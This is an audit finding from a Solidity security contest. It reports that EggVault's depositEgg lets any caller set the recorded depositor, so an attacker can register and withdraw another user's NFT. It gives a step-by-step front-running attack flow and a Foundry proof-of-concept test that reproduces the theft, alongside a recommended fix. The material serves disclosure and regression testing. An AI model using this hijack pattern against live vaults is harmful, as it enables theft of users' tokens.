Eggstravaganza

First Flight #37
Beginner Friendly, Solidity
100 EXP
Submission Details
Severity: high
Valid

Arbitrary Depositor Assignment Allows NFT Theft in EggVault

Summary

The depositEgg function in EggVault.sol lets any caller choose the depositor address that is recorded for an NFT already held by the vault. The function has no access control and never ties the depositor to msg.sender or to the address that actually transferred the token, so whoever registers a token first becomes its recorded depositor. An attacker who registers a victim's token before the victim does can then withdraw it.

Vulnerability Details

The vulnerable code exists in the depositEgg function:

function depositEgg(uint256 tokenId, address depositor) public {
    require(eggNFT.ownerOf(tokenId) == address(this), "...");
    require(!storedEggs[tokenId], "...");
    storedEggs[tokenId] = true;
    eggDepositors[tokenId] = depositor; // 🚨 Vulnerable line: caller-chosen, never checked against msg.sender
}

Attack flow:

  1. User A transfers their NFT to the vault as the first of two transactions (the vault only accepts registration once it already owns the token)

  2. The attacker, seeing the transfer in the mempool or on chain, calls depositEgg(tokenId, attackerAddress) so that it executes before User A's own depositEgg(tokenId, userA); both require checks pass because the vault owns the token and it is not yet stored

  3. The attacker is now the recorded depositor, and User A's registration reverts on the storedEggs check

  4. The attacker calls withdrawEgg for that tokenId, which releases the NFT to the recorded depositor

No mempool race is strictly needed: any token sitting in the vault with storedEggs[tokenId] == false can be claimed by whoever calls depositEgg first, so the exposure window is the whole gap between the user's two transactions.

Impact

• Permanent loss of user NFTs (direct financial impact)
• Complete compromise of vault security model
• Loss of protocol credibility

Tools Used

• Manual code review
• Foundry test simulation

Recommendations

Critical Fix: drop the depositor parameter, record msg.sender, and have the vault pull the token itself so that the transfer and the registration happen in one transaction (the caller approves the vault first). Note that checking msg.sender == ownerOf(tokenId) and ownerOf(tokenId) == address(this) in the same function cannot both hold, so the ownership check has to happen before the token moves:

function depositEgg(uint256 tokenId) public { // depositor param removed
    require(address(eggNFT) != address(0), "NFT contract not set");
    require(!storedEggs[tokenId], "Egg already deposited");
    require(eggNFT.ownerOf(tokenId) == msg.sender, "Not NFT owner");
    storedEggs[tokenId] = true;
    eggDepositors[tokenId] = msg.sender; // use the transaction sender
    eggNFT.transferFrom(msg.sender, address(this), tokenId); // reverts unless the vault is approved
}

If the two-step flow (transfer, then register) must be kept, the vault should instead implement IERC721Receiver and record the from address passed to onERC721Received, since that value is supplied by the NFT contract rather than by the caller.
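The attack flow above and the recommended pull-based fix, as a Foundry test. This is an added example, not code from this finding or from the Eggstravaganza repository: the NFT is a minimal ERC-721 stand-in constructed here, VulnerableEggVault reproduces the snippet in this report, FixedEggVault is the hardened variant, and the names MockEggNFT, EggVaultBase, VulnerableEggVault, FixedEggVault and DepositorHijackTest are assumptions; the real EggVault and EggstravaganzaNFT can be substituted for them.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Minimal ERC-721 stand-in constructed for this test (not the project's EggstravaganzaNFT):
// only the ownerOf/approve/transferFrom surface that the vault touches.
contract MockEggNFT {
    mapping(uint256 => address) private _owners;
    mapping(uint256 => address) private _approved;
    function mint(address to, uint256 id) external { _owners[id] = to; }
    function approve(address to, uint256 id) external { require(msg.sender == _owners[id], "not owner"); _approved[id] = to; }
    function ownerOf(uint256 id) public view returns (address) { require(_owners[id] != address(0), "no token"); return _owners[id]; }
    function transferFrom(address from, address to, uint256 id) external {
        require(ownerOf(id) == from, "wrong from");
        require(msg.sender == from || msg.sender == _approved[id], "not authorised");
        _owners[id] = to;
        delete _approved[id];
    }
}

// Shared storage and withdraw logic, using the mapping names from the finding.
abstract contract EggVaultBase {
    MockEggNFT public immutable eggNFT;
    mapping(uint256 => bool) public storedEggs;
    mapping(uint256 => address) public eggDepositors;
    constructor(MockEggNFT nft) { eggNFT = nft; }
    function withdrawEgg(uint256 tokenId) public {
        require(storedEggs[tokenId] && eggDepositors[tokenId] == msg.sender, "not depositor");
        storedEggs[tokenId] = false;
        delete eggDepositors[tokenId];
        eggNFT.transferFrom(address(this), msg.sender, tokenId);
    }
}

// Vulnerable vault reproduced from the snippet in the finding: the caller picks the depositor.
contract VulnerableEggVault is EggVaultBase {
    constructor(MockEggNFT nft) EggVaultBase(nft) {}
    function depositEgg(uint256 tokenId, address depositor) public {
        require(eggNFT.ownerOf(tokenId) == address(this), "NFT not in vault");
        require(!storedEggs[tokenId], "already deposited");
        storedEggs[tokenId] = true;
        eggDepositors[tokenId] = depositor; // attacker-controlled
    }
}

// Hardened vault (assumed fix): records msg.sender and pulls the token itself, so the
// transfer and the registration are one transaction and nobody else can register first.
contract FixedEggVault is EggVaultBase {
    constructor(MockEggNFT nft) EggVaultBase(nft) {}
    function depositEgg(uint256 tokenId) public {
        require(!storedEggs[tokenId], "already deposited");
        storedEggs[tokenId] = true;
        eggDepositors[tokenId] = msg.sender;
        eggNFT.transferFrom(msg.sender, address(this), tokenId); // reverts unless the caller owns the token
    }
}

contract DepositorHijackTest is Test {
    MockEggNFT nft;
    address userA = makeAddr("userA");
    address attacker = makeAddr("attacker");
    uint256 constant TOKEN_ID = 1;

    function setUp() public {
        nft = new MockEggNFT();
        nft.mint(userA, TOKEN_ID);
    }

    function test_vulnerable_attackerHijacksDeposit() public {
        VulnerableEggVault vault = new VulnerableEggVault(nft);
        // Step 1: User A's first transaction moves the egg into the vault.
        vm.prank(userA);
        nft.transferFrom(userA, address(vault), TOKEN_ID);
        // Step 2: the attacker's registration is mined before User A's depositEgg(TOKEN_ID, userA).
        vm.prank(attacker);
        vault.depositEgg(TOKEN_ID, attacker);
        // Step 3: User A's own registration reverts and the attacker is on record.
        vm.expectRevert(bytes("already deposited"));
        vm.prank(userA);
        vault.depositEgg(TOKEN_ID, userA);
        assertEq(vault.eggDepositors(TOKEN_ID), attacker);
        // Step 4: the attacker withdraws User A's NFT.
        vm.prank(attacker);
        vault.withdrawEgg(TOKEN_ID);
        assertEq(nft.ownerOf(TOKEN_ID), attacker);
    }

    function test_fixed_attackerCannotRegisterOthersToken() public {
        FixedEggVault vault = new FixedEggVault(nft);
        vm.prank(userA);
        nft.approve(address(vault), TOKEN_ID);
        // The pull-based deposit reverts for anyone who does not own the token.
        vm.expectRevert(bytes("wrong from"));
        vm.prank(attacker);
        vault.depositEgg(TOKEN_ID);
        vm.prank(userA);
        vault.depositEgg(TOKEN_ID);
        assertEq(vault.eggDepositors(TOKEN_ID), userA);
        assertEq(nft.ownerOf(TOKEN_ID), address(vault));
    }
}
```

Save the file under test/ in a Foundry project with forge-std installed and run forge test; the first test passes only while the depositor is caller-chosen, so it doubles as a regression test once the real vault is fixed.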
Updates

Lead Judging Commences

m3dython Lead Judge 5 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Frontrunning Vulnerability DepositEgg

Front-running depositEgg allows deposit ownership hijacking.
